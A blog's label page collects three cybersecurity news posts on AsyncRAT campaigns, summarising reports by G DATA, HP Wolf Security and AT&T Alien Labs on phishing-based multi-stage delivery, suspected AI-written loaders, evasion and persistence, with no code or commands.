Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label AsyncRAT. Show all posts
Remote Access Trojan
AsyncRAT Bitbucket malware Remote Access Trojan

AsyncRAT Malware Exploits Bitbucket to Launch Multi-Stage Attack

 

G DATA Security Lab has discovered a sophisticated malware operation that used Bitbucket, a popular code hosting platform, to propagate AsyncRAT, a well-known remote access trojan. 

According to the study, the attackers employed a multi-stage assault strategy, exploiting Bitbucket to host and disseminate malware payloads while circumventing detection. 

The malware operators employed multiple layers of Base64 encoding to obfuscate the code and hide the true nature of the assault. “After peeling back those layers we were able to uncover the full story and key indicators of compromise (IOCs) we found while analyzing the AsyncRAT payload delivery,” the report explains. 

Bitbucket's trustworthy reputation as a software development platform has made it a popular target for attackers. The perpetrators employed Bitbucket repositories to host a variety of malicious payloads, including the AsyncRAT.

"Attackers have turned to Bitbucket, a popular code hosting platform, to host their malicious payloads," the researchers wrote, emphasising that this strategy gives "legitimacy" and "accessibility" for propagating the malware. 

Modus operandi

The attack starts with a phishing email that includes a malicious VBScript file called "01 DEMANDA LABORAL.vbs," which runs a PowerShell command. This initial stage obfuscates and delivers the payload via many levels of string manipulation and Base64 encoding. "The VBScript constructs and executes a PowerShell command, effectively transitioning the attack to the next stage," according to the report. 

The second stage involves the PowerShell script downloading a file from a Bitbucket repository. This file, named "dllhope.txt," contains a Base64-encoded payload that is decrypted into a.NET built file, disclosing the true nature of the AsyncRAT malware. 

When successfully deployed, AsyncRAT gives attackers complete remote control over the infected system. "AsyncRAT provides attackers with extensive control over infected machines, enabling them to perform a wide range of malicious activities," according to G DATA's investigation. These actions include remote desktop control, file management, keylogging, access to webcams and microphones, and unauthorised command execution. 

The report also illustrates how attackers exploit anti-virtualization measures to evade detection in sandbox environments. "If the flag parameter contains '4,' the code checks for the presence of virtualisation tools like VMware or VirtualBox, likely to avoid analysis," indicated G DATA. Persistence is achieved through a variety of tactics, including Windows registry alterations and the establishment of startup shortcuts, which ensure the malware remains active even after the system reboots.
Read more »
threat report
AI Tool Artificial Intelligence AsyncRAT Generative AI malware threat report

AI-Generated Malware Discovered in the Wild

 

Researchers found malicious code that they suspect was developed with the aid of generative artificial intelligence services to deploy the AsyncRAT malware in an email campaign that was directed towards French users. 

While threat actors have employed generative AI technology to design convincing emails, government agencies have cautioned regarding the potential exploit of AI tools to create malicious software, despite the precautions and restrictions that vendors implemented. 

Suspected cases of AI-created malware have been spotted in real attacks. The malicious PowerShell script that was uncovered earlier this year by cybersecurity firm Proofpoint was most likely generated by an AI system. 

As less technical threat actors depend more on AI to develop malware, HP security experts discovered a malicious campaign in early June that employed code commented in the same manner a generative AI system would. 

The VBScript established persistence on the compromised PC by generating scheduled activities and writing new keys to the Windows Registry. The researchers add that some of the indicators pointing to AI-generated malicious code include the framework of the scripts, the comments that explain each line, and the use of native language for function names and variables. 

AsyncRAT, an open-source, publicly available malware that can record keystrokes on the victim device and establish an encrypted connection for remote monitoring and control, is later downloaded and executed by the attacker. The malware can also deliver additional payloads. 

The HP Wolf Security research also states that, in terms of visibility, archives were the most popular delivery option in the first half of the year. Lower-level threat actors can use generative AI to create malware in minutes and customise it for assaults targeting different areas and platforms (Linux, macOS). 

Even if they do not use AI to create fully functional malware, hackers rely on it to accelerate their labour while developing sophisticated threats.
Read more »
US infrastructure
AsyncRAT command-and-control infrastructure Cybersecurity domain generation algorithm malware open-source trojan Phishing emails Threat Group US infrastructure

This Malware is Assaulting Critical US Infrastructure for Almost a Year

 

Over the course of the last 11 months, a threat group has actively engaged in a phishing campaign targeting employees across various companies, distributing an open-source trojan program named AsyncRAT. The victims of this campaign notably include companies responsible for managing critical infrastructure in the United States.

The cybersecurity division of AT&T, known as Alien Labs, has reported that the attackers employ a domain generation algorithm (DGA) within their command-and-control (C&C) infrastructure. This technique helps them rotate through a large number of domains, making it challenging to block traffic. In an effort to evade detection, the threat actors continually generate new samples of the malicious tool. Researchers have identified over 300 samples and 100 domains associated with this particular campaign.

AsyncRAT, an open-source remote access tool released in 2019 and still available on GitHub, serves as the attackers' weapon of choice. As a remote access trojan (RAT), AsyncRAT offers features such as keylogging, exfiltration techniques, and initial access staging for delivering the final payload.

It's not uncommon for even sophisticated threat actors to utilize open-source malware frameworks, providing advantages such as low development costs and plausible deniability. Interestingly, AsyncRAT had been previously employed in 2022 by an APT group known as Earth Berberoka or GamblingPuppet, as tracked by security firm Trend Micro.

The phishing emails, scrutinized by Alien Labs and other researchers, employ a thread hijacking technique to direct users to a phishing page, eventually dropping a JavaScript (.js) file on users' computers. This script, when opened in Notepad, contains numerous randomly commented-out English words, while variants using Sanskrit characters have also been reported in previous campaigns. The highly obfuscated script aims to download the second-stage payload from a URL encoded using a custom cipher and decimal values.

The second-stage payload is another encoded script in PowerShell, executed directly in memory without being saved to disk. The PowerShell script communicates with a rotating C&C server domain, sending information such as computer hostname and a variable indicating the likelihood of the computer being a virtual machine or sandbox.

If deemed a valid target, the C&C server deploys AsyncRAT. In the case of a potential virtual machine or sandbox, the server redirects the request to Google or launches a different PowerShell script that downloads and initiates a decoy RAT, designed to distract researchers investigating the campaign.

To further complicate detection, the attackers regularly randomize the script code and malware samples, and they rotate C&C domains weekly. Despite these efforts, Alien Lab researchers managed to reverse-engineer the domain generation algorithm, providing insights into historical samples and enabling the development of detection signatures for future infrastructure identification. The AT&T Alien Labs report includes detection signatures for the Suricata intrusion detection system and a list of indicators of compromise (IOC) for building detections on other systems.
Read more »
Subscribe to: Posts (Atom)